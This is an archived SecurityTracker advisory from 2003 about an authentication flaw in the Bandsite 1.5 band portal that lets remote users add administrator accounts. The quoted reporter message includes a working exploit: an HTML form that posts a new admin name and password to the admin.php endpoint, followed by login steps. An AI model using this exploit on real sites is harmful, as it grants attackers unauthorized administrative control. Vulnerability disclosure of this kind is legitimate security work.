SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Join our Affiliate Program
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Forum/Board/Portal)  >  Bandsite Vendors:  de Vos, Jelle
Bandsite Portal Software Authentication Flaw Lets Remote Users Add Administrators
SecurityTracker Alert ID:  1007690
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 12 2003
Impact:  Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.5
Description:  Nasser.M.Sh reported a vulnerability in Bandsite. A remote user can gain administrative access on the application.

It is reported that a remote user can submit a specially crafted POST request to the following URL to add a user account that will have administrator privileges on the application:

http://[target]/bandwebsite/admin.php?&Login=1&section=admins

The vendor has reportedly been notified without response.
Impact:  A remote user can add administrative user accounts.
Solution:  No solution was available at the time of this entry.
Vendor URL:  membres.lycos.fr/fluxx/bandwebsite.php (Links to External Site)
Cause:  Authentication error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  NaSsEr .M.Sh <nmsh_sa@yahoo.com>
Message History:   None.

 Source Message Contents
Date:  Fri, 12 Sep 2003 03:46:46 -0700 (PDT)
From:  NaSsEr .M.Sh <nmsh_sa@yahoo.com>
Subject:  vulnerability in Bandsite Allows Gaining Admin Access.

 


Informations :
°°°°°°°°°°°°°°
- Product : Bandsite portal system
- Website : http://membres.lycos.fr/fluxx/bandwebsite.php
- Author  : Jelle de Vos
- Tested version :1.5
- Problem : vulnerability in Bandsite Allows Gaining Admin Access.

Product Description :
°°°°°°°°°°°°°°°°°°°°°
Bandsite is an online portal system designed for Bands. Features: themes
support, news posting, audio sections, guestbook, tour guide, an admin
section to manage overall data and configurations, and more.

Exploits :
°°°°°°°°°°
=====================   nmsh.htm    ==============================
       <TABLE cellSpacing=1 cellPadding=5 width=570 bgColor=#665E6B border=0>
         <TBODY>
         <tr><td bgcolor=#ffffff>
&nbsp;</p>
<p>
<form
action=http://[target]/bandwebsite/admin.php?&Login=1&section=admins
method=post>
    Name:<br>
<input type=text name='name' value='nmsh' size="20"><br>
    Pass:<br>
<input type=text name='pass' value='nmsh' size="20"><br>
<input type=submit name='submit' value='send'><br>
</form></TD></TR></TBODY></TABLE>
<P><BR></P></TD></TR></TBODY></TABLE></BODY>
=====================    nmsh.htm   ==============================
The admin has been added!
:(
now go to this link :
http://[target]/bandwebsite/login.php
and login as admin
name : nmsh
pass : nmsh
Vendor:
°°°°°°°
Vendor has been contacted, no reply received.

Provided by :
°°°°°°°°°°°°°
Nasser.M.Sh
nmsh_sa(at)yahoo.com

------------------------------------------------------------------------
Do you Yahoo!?
Yahoo! SiteBuilder
<http://us.rd.yahoo.com/evt=10469/*http://sitebuilder.yahoo.com> - Free,
easy-to-use web site design software


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC